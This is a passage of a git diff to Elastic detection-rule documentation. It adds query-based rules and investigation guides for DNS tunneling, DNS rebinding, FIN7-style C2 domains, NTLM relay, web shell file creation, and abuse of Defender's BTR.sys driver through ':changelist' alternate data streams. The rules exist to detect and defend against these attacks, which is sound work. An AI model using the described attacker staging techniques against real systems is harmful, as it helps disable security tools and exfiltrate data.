incidents or vulnerabilities. +- Correlate the detected activity with any recent changes in network configurations or security policies that might explain the traffic pattern. +- Consult threat intelligence sources to determine if the destination IP address or domain has been associated with known threat actors or command and control infrastructure. + + +*False positive analysis* + + +- A legitimate VPN gateway will alert when it is first deployed or first observed after more than 5 days of inactivity. +- Legitimate VPN traffic using IPSEC NAT Traversal can trigger alerts. Regularly review and whitelist known IP addresses or subnets associated with authorized VPN connections to reduce false positives. +- Network devices or services that rely on IPSEC for secure communication may generate expected traffic on port 4500. Identify and document these devices, then create exceptions in the detection rule to prevent unnecessary alerts. +- Automated backup or synchronization services that use IPSEC for secure data transfer might be flagged. Monitor these services and exclude their traffic patterns if they are verified as non-threatening. +- Some enterprise applications may use IPSEC NAT Traversal for secure communication. Conduct an inventory of such applications and adjust the rule to exclude their traffic after confirming their legitimacy. +- Regularly update the list of known safe IP addresses and services to ensure that new legitimate sources of IPSEC NAT Traversal traffic are promptly excluded from triggering alerts. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further potential malicious activity and lateral movement. +- Conduct a thorough analysis of the isolated system to identify any signs of compromise, such as unauthorized access or data exfiltration, focusing on logs and network traffic related to UDP port 4500. +- Block all suspicious IP addresses associated with the detected traffic on port 4500 at the network perimeter to prevent further communication with potential threat actors. +- Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to ensure they effectively block unauthorized IPSEC NAT Traversal traffic, particularly on UDP port 4500. +- Restore the affected system from a known good backup if any signs of compromise are confirmed, ensuring that all security patches and updates are applied before reconnecting to the network. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced monitoring and logging for UDP traffic on port 4500 to detect and respond to any future suspicious activity promptly. + +==== Rule query + + +[source, js] +---------------------------------- +FROM packetbeat-*, auditbeat-*, filebeat-*, logs-network_traffic.flow-*, logs-panw.panos*, logs-pfsense.log-*, logs-zeek.connection-* METADATA _id +| WHERE ( + data_stream.dataset IN ("network_traffic.flow", "zeek.connection") + OR MV_CONTAINS(event.category, "network") + OR MV_CONTAINS(event.category, "network_traffic") + ) + AND network.transport == "udp" + AND source.port == 4500 + AND destination.port == 4500 + AND CIDR_MATCH(source.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16") + AND NOT CIDR_MATCH( + destination.ip, + "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", + "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", + "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", + "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", + "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", "198.18.0.0/15", + "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", "FF00::/8" + ) + AND ( + data_stream.dataset IS NULL + OR data_stream.dataset != "panw.panos" + OR event.action IS NULL + OR event.action NOT IN ("flow_dropped", "flow_denied") + ) +| EVAL Esql.dataset = COALESCE(data_stream.dataset, event.dataset) +| STATS + Esql.first_seen = MIN(@timestamp), + Esql.last_seen = MAX(@timestamp), + Esql.event_count = COUNT(*), + Esql.source_ip_count = COUNT_DISTINCT(source.ip), + Esql.source_ip_values = MV_SLICE(VALUES(source.ip), 0, 100), + Esql.event_action_values = VALUES(event.action), + Esql.dataset_values = VALUES(Esql.dataset), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 20) + BY destination.ip +| EVAL Esql.recent = DATE_DIFF("minute", Esql.first_seen, NOW()) +| WHERE Esql.recent >= 0 AND Esql.recent <= 10 +| KEEP destination.ip, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Non-Application Layer Protocol +** ID: T1095 +** Reference URL: https://attack.mitre.org/techniques/T1095/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Technique: +** Name: Encrypted Channel +** ID: T1573 +** Reference URL: https://attack.mitre.org/techniques/T1573/ diff --git a/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc b/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc index 4a0d0363fc..068e8fa8fa 100644 --- a/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc @@ -26,10 +26,11 @@ This rule detects a known command and control pattern in network events. The FIN * Use Case: Threat Detection * Tactic: Command and Control * Domain: Endpoint +* Rule Type: ESQL * Data Source: PAN-OS * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: @@ -55,6 +56,10 @@ In the event this rule identifies benign domains in your environment, the `desti from packetbeat-*, filebeat-*, logs-network_traffic.*, logs-panw.panos* metadata _id, _version, _index | where ( data_stream.dataset in ("network_traffic.tls", "network_traffic.http") or + ( + data_stream.dataset == "panw.panos" and + network.application in ("ssl", "web-browsing") and network.transport == "tcp" + ) or (event.category in ("network", "network_traffic") and network.protocol in ("tls", "http") and network.transport == "tcp") ) | where destination.domain RLIKE "[a-zA-Z]{4,5}\\.(pw|us|club|info|site|top)" diff --git a/docs/detections/prebuilt-rules/rule-details/potential-application-shimming-via-sdbinst.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-application-shimming-via-sdbinst.asciidoc index 1f2f110b7a..ddedb9d5f9 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-application-shimming-via-sdbinst.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-application-shimming-via-sdbinst.asciidoc @@ -44,7 +44,7 @@ The Application Shim was created to allow for backward compatibility of software * Data Source: Crowdstrike * Resources: Investigation Guide -*Version*: 319 +*Version*: 320 *Rule authors*: @@ -136,6 +136,8 @@ process where host.os.type == "windows" and event.type == "start" and process.na not (process.args : "-m" and process.args : "-bg") and not process.args : ( "-mm", + "?:\\Windows\\appcompat\\cloudsdb\\apppatch.sdb", + "\"?:\\Windows\\appcompat\\cloudsdb\\apppatch.sdb\"", "?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\sysMergeInboxStoreApp.sdb", "\"?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\sysMergeInboxStoreApp.sdb\"", "?:\\Program Files\\WindowsApps\\Microsoft.ApplicationCompatibilityEnhancements_*\\sdb\\msiMergeInboxStoreApp.sdb", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-computer-account-ntlm-relay-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-computer-account-ntlm-relay-activity.asciidoc index 5185af96c4..957b84b299 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-computer-account-ntlm-relay-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-computer-account-ntlm-relay-activity.asciidoc @@ -38,7 +38,7 @@ Identifies potential relay activities against a Computer account by identifying * Data Source: Windows Security Event Logs * Resources: Investigation Guide -*Version*: 112 +*Version*: 113 *Rule authors*: @@ -127,7 +127,12 @@ authentication where host.os.type == "windows" and event.code in ("4624", "4625" /* Verify if the Source IP belongs to the host */ not endswith(string(source.ip), string(host.ip)) and - indexOf(string(host.ip), string(source.ip)) == null + indexOf(string(host.ip), string(source.ip)) == null and + + /* Exclude self-authentication from multi-homed hosts where the NTLM workstation name matches the machine account */ + not (source.domain != null and + startswith~(user.name, source.domain) and + startswith~(source.domain, substring(user.name, 0, -1))) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dns-rebinding-from-public-to-private-address.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dns-rebinding-from-public-to-private-address.asciidoc new file mode 100644 index 0000000000..56c4c1561d --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-dns-rebinding-from-public-to-private-address.asciidoc @@ -0,0 +1,214 @@ +[[potential-dns-rebinding-from-public-to-private-address]] +=== Potential DNS Rebinding from Public to Private Address + +Identifies a client resolving the same public registered domain to both a public IP address and a private, loopback, link-local, unique-local IPv6, or shared address. This includes both address classes being observed at the same timestamp, and a public answer followed within five minutes by a private answer where the minimum TTL across all answer records in the private-answer events is 60 seconds or less. Either pattern is consistent with DNS rebinding that pivots browser or application trust to internal resources. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://owasp.org/www-community/attacks/DNS_Rebinding +* https://portswigger.net/web-security/ssrf + +*Tags*: + +* Domain: Network +* Use Case: Threat Detection +* Use Case: Network Security Monitoring +* Tactic: Initial Access +* Rule Type: ESQL +* Data Source: Network Packet Capture +* Data Source: Network Traffic +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential DNS Rebinding from Public to Private Address* + + +DNS rebinding uses attacker-controlled public names that resolve to internal addresses so a victim browser or client +reaches RFC1918, loopback, link-local, unique-local IPv6, or shared-address targets. This rule alerts on two patterns +for the same client and fully qualified domain name: public and internal addresses whose first observations have the +same timestamp, or a public answer followed by an internal answer within five minutes. Sequential transitions also +require the minimum TTL across all DNS answer records in the private-answer events to be 60 seconds or less. Equal +timestamps often represent a mixed-answer response, but do not prove that the addresses came from one DNS transaction; +parallel A and AAAA events can share a timestamp. Equal-timestamp matches do not require the TTL or five-minute gates. + +`Esql.client_ip` is `client.ip` when present and otherwise `source.ip`. Depending on sensor placement this value may +identify an endpoint, a recursive resolver, a forwarder, or a localhost DNS listener such as `127.0.0.1`. Resolver or +loopback identities can merge many hosts into one bucket. + + +*Possible investigation steps* + + +- Review `dns.question.name`, `dns.question.registered_domain`, `Esql.public_ips`, and `Esql.private_ips` to confirm the + same name resolved to both a public and an internal address. +- Check `Esql.same_timestamp`. A value of `true` means both address classes were first observed at the same timestamp, + but does not establish that they came from one DNS transaction. Compare `Esql.first_public_answer`, + `Esql.first_private_answer`, `Esql.transition_seconds`, and `Esql.min_private_event_ttl` for sequential transitions. + Short transitions and TTL values near zero increase confidence. +- Use `Esql.resolved_ip_observation_count`, `Esql.resolved_ip_count`, `Esql.dataset_values`, and + `Esql.observer_name_values` to assess observation volume, distinct IP cardinality, and the integrations and sensors + that contributed to the alert. +- Identify the requesting client using `Esql.client_ip`. Confirm whether that address is an endpoint rather than a + recursive resolver, forwarder, or localhost DNS service before attributing the activity to one host. +- Determine whether the registered domain is attacker-controlled or a legitimate split-horizon or failover domain. +- Check the requesting host for browser or application connections to the resolved private address immediately after + the private answer. +- Review the targeted internal service for requests carrying the public domain in the HTTP Host header or TLS SNI and + for unauthorized access, state changes, or sensitive-data retrieval. + + +*False positive analysis* + + +- Split-horizon DNS, VPN transitions, service discovery, failover, and hairpin NAT can legitimately cause a public + registered domain to alternate between public and private answers. Confirm the domain and resolver behavior with DNS + administrators. +- Dual-stack names may publish a public IPv4 address and a unique-local IPv6 address under the same question name. +- Security products may intentionally sinkhole suspicious domains to loopback or private addresses with short TTLs. +- Exclude confirmed internal domains, approved sinkholes, and controlled security-testing infrastructure by registered + domain or client only after validation. Do not exclude a resolver address until the originating endpoint is known. + + +*Response and remediation* + + +- Block or sinkhole the queried name at recursive resolvers if it is confirmed malicious. +- Patch or isolate affected internal services reached through the rebound name. +- Restrict outbound DNS for clients that should not resolve arbitrary external names directly. + + +==== Setup + + + +*Setup* + + +This rule requires DNS transaction events from one of the following passive network integrations: + +- Elastic Network Packet Capture (`network_traffic.dns`) in `logs-network_traffic.dns-*` +- Zeek (`zeek.dns`) in `logs-zeek.dns-*` +- Legacy Packetbeat DNS events in `packetbeat-*` + +Enable DNS logging so that `dns.question.registered_domain` and `dns.resolved_ip` are populated. Populate +`dns.answers.ttl` to detect sequential public-to-private transitions; equal-timestamp matches do not require TTL data. + +Place the sensor where it observes endpoint-to-resolver DNS traffic. If the sensor is upstream of a recursive resolver, +or if the captured client is a localhost listener such as `127.0.0.1`, `Esql.client_ip` may identify shared DNS +infrastructure instead of the originating endpoint and can merge answers from many hosts. + +DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), and other encrypted DNS traffic are not visible to packet capture unless the +sensor receives decrypted DNS telemetry or equivalent resolver logs mapped to ECS. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-network_traffic.dns-*, logs-zeek.dns-*, packetbeat-* +| where + ( + data_stream.dataset in ("network_traffic.dns", "zeek.dns") or + event.dataset == "dns" + ) and + dns.question.name is not null and + dns.question.registered_domain is not null and + dns.resolved_ip is not null and + TO_UPPER(dns.response_code) == "NOERROR" and + TO_UPPER(dns.question.type) in ("A", "AAAA") +| eval + Esql.client_ip = COALESCE(client.ip, source.ip), + Esql.dataset = COALESCE(data_stream.dataset, event.dataset) +| where Esql.client_ip is not null +| mv_expand dns.resolved_ip +| eval Esql.is_private = CIDR_MATCH( + dns.resolved_ip, + "0.0.0.0/32", + "10.0.0.0/8", + "100.64.0.0/10", + "127.0.0.0/8", + "169.254.0.0/16", + "172.16.0.0/12", + "192.168.0.0/16", + "::1/128", + "fc00::/7", + "fe80::/10" + ) +| eval + Esql.private_time = CASE(Esql.is_private, @timestamp, null), + Esql.public_time = CASE(not Esql.is_private, @timestamp, null), + Esql.private_event_ttl = CASE(Esql.is_private, MV_MIN(dns.answers.ttl), null), + Esql.private_ip = CASE(Esql.is_private, dns.resolved_ip, null), + Esql.public_ip = CASE(not Esql.is_private, dns.resolved_ip, null) +| stats + Esql.resolved_ip_observation_count = COUNT(*), + Esql.resolved_ip_count = COUNT_DISTINCT(dns.resolved_ip), + Esql.first_public_answer = MIN(Esql.public_time), + Esql.first_private_answer = MIN(Esql.private_time), + Esql.min_private_event_ttl = MIN(Esql.private_event_ttl), + Esql.public_ips = MV_SLICE(VALUES(Esql.public_ip), 0, 100), + Esql.private_ips = MV_SLICE(VALUES(Esql.private_ip), 0, 100), + Esql.dataset_values = MV_SLICE(VALUES(Esql.dataset), 0, 10), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 20) + by Esql.client_ip, dns.question.name, dns.question.registered_domain +| eval + Esql.same_timestamp = Esql.first_public_answer == Esql.first_private_answer, + Esql.transition_seconds = DATE_DIFF("seconds", Esql.first_public_answer, Esql.first_private_answer) +| where + Esql.first_public_answer is not null and + Esql.first_private_answer is not null and + ( + Esql.same_timestamp or + ( + Esql.first_public_answer < Esql.first_private_answer and + Esql.min_private_event_ttl is not null and + Esql.min_private_event_ttl <= 60 and + Esql.transition_seconds <= 300 + ) + ) +| keep Esql.*, dns.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Drive-by Compromise +** ID: T1189 +** Reference URL: https://attack.mitre.org/techniques/T1189/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc new file mode 100644 index 0000000000..a9f8bd6f29 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc @@ -0,0 +1,196 @@ +[[potential-dns-tunneling-via-long-and-unique-subdomains]] +=== Potential DNS Tunneling via Long and Unique Subdomains + +Identifies a client generating many unique, unusually long DNS query names to the same registered domain within a five-minute window. Malware DNS tunnels and DNS command-and-control commonly encode data in lengthy subdomain portions under one apex domain. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/ + +*Tags*: + +* Domain: Network +* Use Case: Threat Detection +* Use Case: Network Security Monitoring +* Rule Type: ESQL +* Tactic: Command and Control +* Tactic: Exfiltration +* Data Source: Network Packet Capture +* Data Source: Fortinet +* Data Source: Network Traffic +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential DNS Tunneling via Long and Unique Subdomains* + + +DNS tunneling encodes data in query labels and often produces many unique, unusually long subdomains under a single apex +domain. This rule aggregates network DNS telemetry for that behavioral pattern without relying on threat intelligence +feeds or machine learning jobs. + +Compare overlapping apex domains against the machine learning **DNS Tunneling** rule when that job is enabled. + + +*Possible investigation steps* + + +- Review `Esql.dns_registered_domain`, `Esql.count_distinct_names`, `Esql.unique_name_ratio`, + `Esql.max_subdomain_length`, and sample values in `Esql.sample_names`. +- Inspect `Esql.dns_question_type_values`. TXT, NULL, CNAME, or MX bursts increase confidence; A/AAAA-only activity can + still be tunneling and should not be dismissed on type alone. +- Use `Esql.first_seen`, `Esql.last_seen`, `Esql.dataset_values`, and `Esql.observer_name_values` to establish the event + span and identify the integrations and sensors that contributed to the alert. +- Confirm whether `Esql.client_ip` is a workstation, server, recursive resolver, forwarder, NAT address, or localhost + DNS service. Resolver and localhost sources merge many clients and are a common false-positive pattern. +- Review `Esql.destination_ip_values` to identify the resolver or authoritative destination observed by the sensor. +- Pivot on the same client and apex domain in raw DNS events and look for follow-on process, file, or additional C2 + activity. + + +*False positive analysis* + + +- CDN, cloud load-balancer, certificate, and software-update services often create long hostnames. Confirm the apex + domain reputation and whether the requesting host role normally uses that provider. +- Security or network appliances performing DNS-based reachability or reputation checks can resemble tunneling. Exclude + confirmed appliance addresses after validation. +- Do not create a global resolver exception until the originating endpoint is known; a shared `Esql.client_ip` can hide + a single infected host behind legitimate bulk lookups. + + +*Response and remediation* + + +- Block the apex domain or forwarding from the affected host at recursive resolvers if malicious activity is confirmed. +- Isolate the source host and inspect for tunneling tools or malware initiating the queries. +- Add temporary blocks for the apex domain while scoping additional hosts querying the same name. + + +==== Setup + + + +*Setup* + + +This rule requires DNS transaction events from one of the following sources: + +- Elastic Network Packet Capture (`network_traffic.dns`) in `logs-network_traffic.dns-*` +- Fortinet FortiGate DNS logs (`fortinet_fortigate.log`) in `logs-fortinet_fortigate.log-*` +- Elastic Zeek (`zeek.dns`) in `logs-zeek.dns-*` +- Legacy Packetbeat DNS events in `packetbeat-*` with `event.dataset` set to `dns` + +Place the sensor where it observes endpoint-to-resolver DNS traffic. If the sensor is upstream of a recursive resolver, +or if the captured client is a localhost listener such as `127.0.0.1`, `Esql.client_ip` may identify shared DNS +infrastructure instead of the originating endpoint. + +DNS-over-HTTPS (DoH), DNS-over-TLS (DoT), and other encrypted DNS traffic are not visible to packet capture unless the +sensor receives decrypted DNS telemetry or equivalent resolver logs mapped to ECS. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-network_traffic.dns-*, logs-fortinet_fortigate.log-*, logs-zeek.dns-*, packetbeat-* +| where + ( + data_stream.dataset in ("network_traffic.dns", "fortinet_fortigate.log", "zeek.dns") + or event.dataset == "dns" + ) + and dns.question.name is not null + and dns.question.registered_domain is not null +| eval + Esql.client_ip = COALESCE(client.ip, source.ip), + Esql.dataset = COALESCE(data_stream.dataset, event.dataset), + Esql.dns_question_name = TO_LOWER(dns.question.name), + Esql.dns_registered_domain = TO_LOWER(dns.question.registered_domain), + Esql.dns_question_type = TO_LOWER(dns.question.type), + Esql.subdomain_length = LENGTH(Esql.dns_question_name) - LENGTH(Esql.dns_registered_domain) - 1 +| where + Esql.client_ip is not null + and Esql.subdomain_length >= 50 + and (Esql.dns_question_type is null or Esql.dns_question_type != "ptr") + and not ENDS_WITH(Esql.dns_question_name, ".arpa") +| eval Esql.time_window = DATE_TRUNC(5 minutes, @timestamp) +| stats + Esql.count_queries = COUNT(*), + Esql.count_distinct_names = COUNT_DISTINCT(Esql.dns_question_name), + Esql.max_subdomain_length = MAX(Esql.subdomain_length), + Esql.avg_subdomain_length = AVG(Esql.subdomain_length), + Esql.dns_question_type_values = MV_SLICE(VALUES(Esql.dns_question_type), 0, 9), + Esql.destination_ip_values = MV_SLICE(VALUES(destination.ip), 0, 4), + Esql.sample_names = MV_SLICE(VALUES(Esql.dns_question_name), 0, 4), + Esql.dataset_values = MV_SLICE(VALUES(Esql.dataset), 0, 9), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 19), + Esql.first_seen = MIN(@timestamp), + Esql.last_seen = MAX(@timestamp) + by Esql.time_window, Esql.client_ip, Esql.dns_registered_domain +| where Esql.count_queries >= 25 and Esql.count_distinct_names >= 15 +| eval Esql.unique_name_ratio = TO_DOUBLE(Esql.count_distinct_names) / Esql.count_queries +| keep Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: DNS +** ID: T1071.004 +** Reference URL: https://attack.mitre.org/techniques/T1071/004/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: https://attack.mitre.org/techniques/T1048/ +* Sub-technique: +** Name: Exfiltration Over Unencrypted Non-C2 Protocol +** ID: T1048.003 +** Reference URL: https://attack.mitre.org/techniques/T1048/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-evasion-via-boot-time-removal-tool.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-evasion-via-boot-time-removal-tool.asciidoc new file mode 100644 index 0000000000..3b3091ee20 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-evasion-via-boot-time-removal-tool.asciidoc @@ -0,0 +1,206 @@ +[[potential-evasion-via-boot-time-removal-tool]] +=== Potential Evasion via Boot Time Removal Tool + +Identifies creation of a ":changelist" NTFS alternate data stream or a Windows service Args registry value pointing to a ":changelist" path. Microsoft Defender's Boot-Time Removal (BTR.sys) driver reads an RC4-encrypted transaction blob from a driver ADS named ":changelist", referenced by HKLM\SYSTEM\*ControlSet*\Services\*\Args. Adversaries can reproduce this staging outside Defender to abuse BTR.sys as a signed kernel primitive for arbitrary file and registry operations. This rule focuses on non-System writers and excludes Microsoft-signed MRT.exe running as SYSTEM, which may perform related remediation staging. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://research.checkpoint.com/2026/btr-reforged-weaponizing-defenders-remediation-driver-as-a-kernel-operation-primitive/ +* https://github.com/Dump-GUY/BTR_CLI + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Evasion via Boot Time Removal Tool* + + +Windows Defender's Boot-Time Removal driver (`BTR.sys`) is instructed via an encrypted configuration stored in an +Alternate Data Stream named `:changelist` on a `.sys` image. The service `Args` value under +`HKLM\SYSTEM\*ControlSet*\Services\\Args` points at that ADS path. Check Point Research (BTR Reforged) +showed that the same staging can be performed by non-Defender tooling (for example BTR_CLI) to drive Ring-0 file and +registry actions, including neutralization of security products during early boot. + + +*Possible investigation steps* + + +- Identify whether the alert is a file ADS creation or a service `Args` registry write using `event.category`, + `file.name` / `file.path`, and `registry.path` / `registry.data.strings`. +- Review `process.executable`, `process.name`, `process.pid`, `process.parent.executable`, and `user.id` to determine + whether a Defender component, MRT, or an unexpected user-mode binary staged the `:changelist` artifact. +- For file events, inspect the base `.sys` path (strip `:changelist`), size, hash, and code signature. Confirm whether + the driver was recently dropped under a user-writable path (Downloads, Temp, Desktop) versus a Defender-managed path. +- For registry events, note the service key name under `Services\*` and check sibling values (`ImagePath`, `Type`, + `Group`). Abuse tooling often sets `Group` to `Boot Bus Extender` and may create the service via direct registry + writes / `NtLoadDriver` without a corresponding SCM service-install event (7045). +- Hunt on the same `host.id` for related activity: creation of `*.sys:*.dat` feedback ADS, load of a Microsoft-signed + driver matching BTR, creation/deletion of `\\SystemRoot\\Temp\\BootClean.log` by PID 4, and deletions of security + binaries attributed to System. +- Correlate with other alerts for the same `user.id` and `host.id` in the prior 48 hours for privilege escalation, + driver load, or Defender tampering. + + +*False positive analysis* + + +- Legitimate Defender or MRT reboot remediation may create `:changelist` ADS and related service Args values. This rule + excludes PID 4 and Microsoft-signed `MRT.exe` as SYSTEM; unsigned or differently signed `MRT.exe` still alerts. Rare + Defender paths (for example `MsMpEng.exe`) may still match and should be validated before exceptioning. +- Security research labs intentionally exercising BTR_CLI or similar PoCs will generate true-positive-looking events; + confirm host cohort and change windows. + + +*Response and remediation* + + +- If activity is unexplained: isolate the host, preserve the `.sys` file and `:changelist` stream, export the service + registry key, and capture the staging process tree before cleanup. +- Search the estate for the same `file.name` / ADS pattern, service `Args` values containing `:changelist`, and related + driver hashes. +- Remove unauthorized service keys and staged drivers, restore any deleted security components from known-good media, + and rotate credentials for accounts that held `SeLoadDriverPrivilege` on the host. +- Restrict and monitor assignment/use of `SeLoadDriverPrivilege`; treat signed remediation drivers as LOLDrivers that + require lineage and ADS context monitoring, not signature blocking alone. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-*, logs-endpoint.events.registry-* metadata _id, _version, _index +| where host.os.type == "windows" + and process.pid != 4 + and not ( + user.id == "S-1-5-18" + and to_lower(process.executable) like """?:\\windows\\system32\\mrt.exe""" + and process.code_signature.subject_name in ("Microsoft Windows", "Microsoft Corporation") + and process.code_signature.trusted == true + ) + and ( + ( + event.category == "file" + and event.type == "creation" + and ends_with(to_lower(file.name), ":changelist") + ) + or ( + event.category == "registry" + and event.type == "change" + and to_lower(registry.path) like """*\\system\\*controlset*\\services\\*\\args""" + and to_lower(registry.data.strings) like "*:changelist" + ) + ) +| keep + @timestamp, + host.id, + host.name, + user.id, + user.name, + process.pid, + process.name, + process.executable, + process.code_signature.subject_name, + event.category, + event.type, + file.path, + file.name, + file.size, + registry.path, + registry.value, + registry.data.strings, + data_stream.namespace, + _id, + _version, + _index +| limit 100 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: NTFS File Attributes +** ID: T1564.004 +** Reference URL: https://attack.mitre.org/techniques/T1564/004/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-iis-web-shell-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-iis-web-shell-file-creation.asciidoc new file mode 100644 index 0000000000..2a259fd124 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-iis-web-shell-file-creation.asciidoc @@ -0,0 +1,164 @@ +[[potential-iis-web-shell-file-creation]] +=== Potential IIS Web Shell File Creation + +Identifies the creation of ASPX/ASHX/ASMX files in specific directories that are commonly targeted by attackers to deploy web shells. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* endgame-* +* logs-sentinel_one_cloud_funnel.* +* logs-m365_defender.event-* +* logs-crowdstrike.fdr* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.viettelcybersecurity.com/toolshell-a-critical-sharepoint-vulnerability-chain-under-active-exploitation/ +* https://www.sentinelone.com/blog/sharepoint-toolshell-zero-day-exploited-in-the-wild-targets-enterprise-servers/ +* 